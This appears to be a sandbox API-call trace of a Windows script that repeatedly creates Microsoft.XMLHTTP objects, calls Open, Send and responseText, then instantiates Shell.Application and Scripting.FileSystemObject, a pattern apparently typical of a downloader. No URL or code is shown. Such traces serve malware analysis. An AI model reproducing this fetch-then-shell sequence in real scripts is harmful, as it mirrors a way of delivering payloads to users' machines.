	[0313.105] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0313.105] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0313.105] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0313.106] ??2@YAPEAX_K@Z () returned 0x62f330
	[0313.106] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0313.106] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0313.106] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0313.106] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0313.106] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0313.106] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0313.106] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0313.106] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0313.106] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0313.106] SysStringLen (param_1=0x0) returned 0x0
	[0313.106] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0313.107] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0313.107] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7530) returned 0x0
	[0313.107] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0313.107] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0313.107] ??2@YAPEAX_K@Z () returned 0x62f310
	[0313.107] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0313.107] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0313.107] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0313.107] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7530) returned 0x0
	[0313.107] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7530) returned 0x3
	[0313.107] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0313.107] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7530, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0313.108] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7530, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0313.108] longjmp () 
	[0313.108] longjmp () 
	[0313.108] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0313.108] SysStringLen (param_1=0x0) returned 0x0
	[0313.108] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0313.108] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0313.108] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0313.108] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0313.108] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0313.108] ??2@YAPEAX_K@Z () returned 0x62f330
	[0313.108] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0313.108] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0313.109] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0313.109] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0313.109] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0313.109] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0313.109] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0313.109] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0313.109] longjmp () 
	[0313.109] longjmp () 
	[0313.109] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0313.109] SysStringLen (param_1=0x0) returned 0x0
	[0313.110] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0313.110] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0313.110] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0313.110] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0313.110] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0313.110] ??2@YAPEAX_K@Z () returned 0x62f310
	[0313.110] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0313.110] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0313.110] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0313.110] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0313.110] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0313.110] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0313.111] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0313.111] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0313.111] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0313.111] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0313.111] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0313.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0313.273] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0313.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0313.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0313.273] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0313.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0313.274] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0313.274] SysStringLen (param_1=0x0) returned 0x0
	[0313.274] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0313.274] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0313.274] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0313.274] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0313.274] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0313.274] ??2@YAPEAX_K@Z () returned 0x62f350
	[0313.274] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0313.274] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0313.275] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0313.275] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0313.275] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0313.275] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0313.275] SysStringLen (param_1=0x0) returned 0x0
	[0313.275] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0313.278] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0313.278] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0313.278] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0313.278] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0313.278] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0313.279] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0314.023] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0314.023] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0314.023] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0314.024] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0314.025] SysStringLen (param_1=0x0) returned 0x0
	[0314.025] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
